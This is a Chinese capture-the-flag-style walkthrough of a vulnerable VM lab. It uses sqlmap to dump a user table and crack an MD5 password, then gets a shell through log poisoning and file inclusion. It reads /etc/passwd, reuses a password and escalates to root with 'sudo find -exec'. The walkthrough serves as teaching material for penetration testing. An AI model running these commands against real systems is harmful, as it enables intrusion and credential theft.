【网络安全:XiaoL_001靶场通关教程】
【网络安全:XiaoL_001靶场通关教程】
信息:
发布者:是小新呀
发布日期:26-5-2
靶场系统:Centos 7 2009
中间件:Apache
数据库:mysql
编程语言:PHP7.2
使用教程:
鼠标右键打击打开,知道XiaoL001文件夹选择XiaoL-001.ovf文件后打开
虚拟机名称:xiaoL_001
虚拟机路径:任意
开始渗透测试:GO!
目标:192.168.10.134
开放了3个端口22,80,111,3306
接下来进行详细的扫描
22端口是ssh,80端口是apache,111是RPC,3306是mysql数据库
打开80端口访问一下
发现301跳转到了,但是没有正常打开,此时此刻需要添加host记录到/etc/hosts文件里面 执行sudo vim /etc/hosts
按i进入编辑模式,输入完成后输入键盘:wq!回车即可
接下来访问网站就可以正常打开了
我们随便点击按钮按一下即可
可以看到URL有一个id参数,或许存在注入点
可以sqlmap一下,执行
sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -dbs
可以看到有一个名为baigo的数据库
用sqlmap进行下一步枚举数据表,可以执行执行这个命令:
sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -D baigo –tables
可以发现有2个数据表,一个是xiao_user和xiao_news,我们实现对xiao_user枚举字段,执行命令:
sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -batch -D baigo -T xiao_user --columns
可以看到有3个字段,id,user,pass接下来我们对于user,pass字段的数据进行枚举,可以输入以下命令:
sqlmap -u "http://www.whitehouse.load/?page=post&id=2" --level 5 -D baigo -T xiao_user -C user,pass -dump
按2个no后就可以看到用户名是xiaoxin,密码是一个哈希,接下来可以用在线的网站(www.somd5.com)进行md5的解密
可以看到密码是:xiaol001
有了账号密码了,说不定网站有后门,可以使用dirsearch扫描一下哈,执行:
dirsearch -u "http://www.whitehouse.load/" -x 404,403,401
有个http://www.whitehouse.load/admin/,访问一下
输入刚才解密的密码xiaoxin和xiaol001
是一个内容管理后台,可以看得出来是发布的文章
这里可以添加文章,不过让我感兴趣的是有一个logs按钮,是一个日志
可以看出来打开日志页面后URL有一个GET方法传入file,可能是一个文件包含,那接下来如何想办法写入反向呢?发布文件或许可以触发
输入后点击发布,可以看到有一个文章
接下来看一眼日志,发现是标题保存到日志里面了,后面应该是时间戳
接下来输入反向?在kali监听4444
点击发布,访问日志页面,发现shell过来了
在shell执行:python -c 'import pty;pty.spawn("/bin/bash")'
先看一下网站目录吧!
ls -la /var/www/html
有一个配置文件,看一下
可以看到有数据库连接信息,有没有可能存在密码复用?看一下/etc/passwd
执行:cat /etc/passwd |grep "/bin/bash" 发现有root和xiao这个账户
试一下root用户?
不是…试一下xiao这个账户?
切换成功xiaoxin的账户,看一眼sudo
执行sudo -l
有一个fand可以特权,试一下吧
执行:sudo find / -type f -exec /bin/bash ;
特权成功!
接下来随便玩!